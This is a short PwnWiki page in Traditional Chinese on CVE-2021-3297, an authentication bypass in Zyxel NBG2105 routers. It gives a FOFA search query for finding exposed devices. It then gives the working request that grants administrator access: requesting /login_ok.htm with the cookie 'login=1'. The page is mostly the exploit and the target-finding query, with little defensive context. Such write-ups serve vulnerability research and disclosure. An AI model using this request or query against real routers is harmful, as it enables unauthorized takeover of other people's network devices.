CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞

From PwnWiki
This page is a translated version of the page CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎español • ‎中文(繁體)‎

漏洞影響

Zyxel NBG2105


FOFA

app="ZyXEL-NBG2105"

Xnip2021-04-06 09-32-28.jpg


其中前端文件 /js/util_gw.js 存在前端對 Cookie login參數的校驗。

請求如下則會以管理員身份跳轉到 home.htm頁面。 


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;


Xnip2021-04-06 09-36-42.jpg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞/zh-hant&oldid=3566"